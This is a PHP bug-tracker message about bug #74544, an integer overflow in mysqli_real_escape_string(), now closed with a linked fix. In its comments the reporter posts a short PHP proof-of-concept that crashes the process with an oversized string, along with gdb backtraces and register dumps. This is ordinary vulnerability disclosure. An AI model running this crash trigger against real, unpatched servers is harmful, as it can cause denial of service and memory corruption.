Bug #74544 [Ver->Csd]: Integer overflow in mysqli_real_escape_string()

From: Date: Mon, 09 Aug 2021 22:09:07 +0000
Subject: Bug #74544 [Ver->Csd]: Integer overflow in mysqli_real_escape_string()
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-235717@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=74544&edit=1 ID: 74544 Updated by: git@php.net Reported by: whitehat002 at hotmail dot com Summary: Integer overflow in mysqli_real_escape_string() -Status: Verified +Status: Closed Type: Bug Package: MySQLi related PHP Version: 7.1.5 Assigned To: cmb Block user comment: N Private report: N New Comment: Automatic comment on behalf of cmb69 Revision: https://github.com/php/php-src/commit/5977610de1aa87630e40a299a2d90fb7cd00bf7c Log: Fix #74544: Integer overflow in mysqli_real_escape_string() Previous Comments: ------------------------------------------------------------------------ [2021-08-09 10:50:05] cmb@php.net The following pull request has been associated: Patch Name: Fix #74544: Integer overflow in mysqli_real_escape_string() On GitHub: https://github.com/php/php-src/pull/7353 Patch: https://github.com/php/php-src/pull/7353.patch ------------------------------------------------------------------------ [2017-05-17 08:14:05] whitehat002 at hotmail dot com gdb-peda$ r [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0xb719409b --> 0x0 EBX: 0xb7ab0000 --> 0x1abda8 ECX: 0xffe6df64 EDX: 0xb71fffa0 --> 0x0 ESI: 0xb7002050 --> 0xb7061600 --> 0x5e ('^') EDI: 0xb70600f0 --> 0xb706e000 --> 0x2000000 EBP: 0x57f7 ESP: 0xbfffbef8 --> 0xffffffff EIP: 0xb7a3a666 (<__memcpy_ssse3_rep+3510>: movntdq XMMWORD PTR [edx+0x60],xmm6) EFLAGS: 0x210282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0xb7a3a657 <__memcpy_ssse3_rep+3495>: movntdq XMMWORD PTR [edx+0x30],xmm3 0xb7a3a65c <__memcpy_ssse3_rep+3500>: movntdq XMMWORD PTR [edx+0x40],xmm4 0xb7a3a661 <__memcpy_ssse3_rep+3505>: movntdq XMMWORD PTR [edx+0x50],xmm5 => 0xb7a3a666 <__memcpy_ssse3_rep+3510>: movntdq XMMWORD PTR [edx+0x60],xmm6 0xb7a3a66b <__memcpy_ssse3_rep+3515>: movntdq XMMWORD PTR [edx+0x70],xmm7 0xb7a3a670 <__memcpy_ssse3_rep+3520>: lea edx,[edx+0x80] 0xb7a3a676 <__memcpy_ssse3_rep+3526>: jae 0xb7a3a605 <__memcpy_ssse3_rep+3413> 0xb7a3a678 <__memcpy_ssse3_rep+3528>: add ecx,0x80 [------------------------------------stack-------------------------------------] 0000| 0xbfffbef8 --> 0xffffffff 0004| 0xbfffbefc --> 0x834a14f (<php_mysqlnd_cmd_write+543>: mov edx,DWORD PTR [esp+0x2c]) 0008| 0xbfffbf00 --> 0xb706e005 --> 0xb7002090 --> 0xb70020a0 --> 0xb70020b0 --> 0xb70020c0 (--> ...) 0012| 0xbfffbf04 --> 0xb7002080 --> 0xb7002090 --> 0xb70020a0 --> 0xb70020b0 --> 0xb70020c0 (--> ...) 0016| 0xbfffbf08 --> 0xffffffff 0020| 0xbfffbf0c --> 0x8348267 (<_mysqlnd_pecalloc+151>: jmp 0x8348211 <_mysqlnd_pecalloc+65>) 0024| 0xbfffbf10 --> 0x4 0028| 0xbfffbf14 --> 0xb7054478 ("toor") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV __memcpy_ssse3_rep () at ../sysdeps/i386/i686/multiarch/memcpy-ssse3-rep.S:1300 1300 ../sysdeps/i386/i686/multiarch/memcpy-ssse3-rep.S: No such file or directory. gdb-peda$ bt #0 __memcpy_ssse3_rep () at ../sysdeps/i386/i686/multiarch/memcpy-ssse3-rep.S:1300 #1 0x0834a14f in php_mysqlnd_cmd_write (_packet=0xb7068038) at /usr/include/i386-linux-gnu/bits/string3.h:52 #2 0x08349ceb in mysqlnd_mysqlnd_protocol_send_command_pub ( payload_decoder_factory=0xb706f000, command=COM_QUERY, arg=0xb7002080 "\220 ", arg_len=0xffffffff, silent=0x0, connection_state=0xb706663c, error_info=0xb7066424, upsert_status=0xb70663fc, stats=0xb7002050, send_close=0x8342540 <mysqlnd_mysqlnd_conn_data_send_close_pub>, send_close_ctx=0xb7066380) at /root/php-7.1.5/ext/mysqlnd/mysqlnd_wireprotocol.c:2772 #3 0x0835910c in mysqlnd_com_query_run (cmd=0xb70544b0) at /root/php-7.1.5/ext/mysqlnd/mysqlnd_commands.c:644 #4 0x083422e0 in mysqlnd_mysqlnd_conn_data_send_query_pub (conn=0xb7066380, query=0xb7002080 "\220 ", query_len=0xffffffff, type=MYSQLND_SEND_QUERY_IMPLICIT, read_cb=0x0, err_cb=0x0) at /root/php-7.1.5/ext/mysqlnd/mysqlnd_connection.c:889 #5 0x08344ca4 in mysqlnd_mysqlnd_conn_data_query_pub (query_len=0xffffffff, query=0xb7002080 "\220 ", conn=0xb7066380) at /root/php-7.1.5/ext/mysqlnd/mysqlnd_connection.c:858 #6 mysqlnd_mysqlnd_conn_data_query_pub (conn=0xb7066380, query=0xb7002080 "\220 ", query_len=0xffffffff) at /root/php-7.1.5/ext/mysqlnd/mysqlnd_connection.c:850 #7 0x081e3b1a in zif_mysqli_query (execute_data=0xb7013120, return_value=0xbfffc100) at /root/php-7.1.5/ext/mysqli/mysqli_nonapi.c:593 #8 0x08455c93 in ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER (execute_data=0xb7013020) at /root/php-7.1.5/Zend/zend_vm_execute.h:970 #9 0x0840969e in execute_ex (ex=0xb7013020) at /root/php-7.1.5/Zend/zend_vm_execute.h:432 #10 0x08457abf in zend_execute (op_array=0xb7069180, return_value=0x0) at /root/php-7.1.5/Zend/zend_vm_execute.h:474 #11 0x083c1890 in zend_execute_scripts (type=0x8, retval=0x0, file_count=0x3) at /root/php-7.1.5/Zend/zend.c:1476 #12 0x08362cad in php_execute_script (primary_file=0xbfffe464) at /root/php-7.1.5/main/main.c:2537 #13 0x08459bd4 in do_cli (argc=0x3, argv=0x8a8e868) at /root/php-7.1.5/sapi/cli/php_cli.c:993 #14 0x080785ad in main (argc=0x3, argv=0x8a8e868) at /root/php-7.1.5/sapi/cli/php_cli.c:1381 #15 0xb791daf3 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6 #16 0x08078641 in _start () —————————————————————————————————————————————————————— It seems to lead to buffer overflow. ------------------------------------------------------------------------ [2017-05-15 09:44:14] whitehat002 at hotmail dot com Has anyone solved it? ------------------------------------------------------------------------ [2017-05-12 02:08:13] whitehat002 at hotmail dot com In new php version,it also has the same bug. ------------------------------------------------------------------------ [2017-05-11 09:17:41] whitehat002 at hotmail dot com I found a way to make it crash.It seems to be able to execute remote code. <?php ini_set("memory_limit",-1); $str=str_repeat("A",0x7fffffff); $str.="AA"; $mysqli=new mysqli("localhost","root","toor","mysql"); $v=$mysqli->real_escape_string($str); $mysqli->query($v); ?> _______________________________________________________ Program received signal SIGSEGV, Segmentation fault. 0xb7a63976 in ?? () from /lib/i386-linux-gnu/libc.so.6 (gdb) bt #0 0xb7a63976 in ?? () from /lib/i386-linux-gnu/libc.so.6 #1 0x08349eaf in php_mysqlnd_cmd_write (_packet=0xb7068038) at /usr/include/i386-linux-gnu/bits/string3.h:52 #2 0x08349a4b in mysqlnd_mysqlnd_protocol_send_command_pub ( payload_decoder_factory=0xb706f000, command=COM_QUERY, arg=0xb7002080 "\220 ", arg_len=4294967295, silent=0 '\000', connection_state=0xb706663c, error_info=0xb7066424, upsert_status=0xb70663fc, stats=0xb7002050, send_close=0x83422a0 <mysqlnd_mysqlnd_conn_data_send_close_pub>, send_close_ctx=0xb7066380) at /root/php-7.1.4/ext/mysqlnd/mysqlnd_wireprotocol.c:2772 #3 0x08358e6c in mysqlnd_com_query_run (cmd=0xb70543d8) at /root/php-7.1.4/ext/mysqlnd/mysqlnd_commands.c:644 #4 0x08342040 in mysqlnd_mysqlnd_conn_data_send_query_pub (conn=0xb7066380, query=0xb7002080 "\220 ", query_len=4294967295, type=MYSQLND_SEND_QUERY_IMPLICIT, read_cb=0x0, err_cb=0x0) at /root/php-7.1.4/ext/mysqlnd/mysqlnd_connection.c:889 #5 0x08344a04 in mysqlnd_mysqlnd_conn_data_query_pub (query_len=4294967295, query=0xb7002080 "\220 ", conn=0xb7066380) at /root/php-7.1.4/ext/mysqlnd/mysqlnd_connection.c:858 #6 mysqlnd_mysqlnd_conn_data_query_pub (conn=0xb7066380, query=0xb7002080 "\220 ", query_len=4294967295) at /root/php-7.1.4/ext/mysqlnd/mysqlnd_connection.c:850 #7 0x081e391a in zif_mysqli_query (execute_data=0xb7013120, return_value=0xbfffc100) at /root/php-7.1.4/ext/mysqli/mysqli_nonapi.c:593 #8 0x084558e3 in ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER (execute_data=0xb7013020) ---Type <return> to continue, or q <return> to quit--- at /root/php-7.1.4/Zend/zend_vm_execute.h:970 #9 0x084093be in execute_ex (ex=0xb7013020) at /root/php-7.1.4/Zend/zend_vm_execute.h:432 #10 0x0845770f in zend_execute (op_array=0xb7069180, return_value=0x0) at /root/php-7.1.4/Zend/zend_vm_execute.h:474 #11 0x083c15c0 in zend_execute_scripts (type=8, retval=0x0, file_count=3) at /root/php-7.1.4/Zend/zend.c:1476 #12 0x08362a0d in php_execute_script (primary_file=0xbfffe464) at /root/php-7.1.4/main/main.c:2537 #13 0x08459824 in do_cli (argc=3, argv=0x8a8d868) at /root/php-7.1.4/sapi/cli/php_cli.c:993 #14 0x080785ad in main (argc=3, argv=0x8a8d868) at /root/php-7.1.4/sapi/cli/php_cli.c:1381 ------------------------------------------------------------------------ The remainder of the comments for this report are too long. To view the rest of the comments, please view the bug report online at https://bugs.php.net/bug.php?id=74544 -- Edit this bug report at https://bugs.php.net/bug.php?id=74544&edit=1

« previous php.bugs (#235717) next »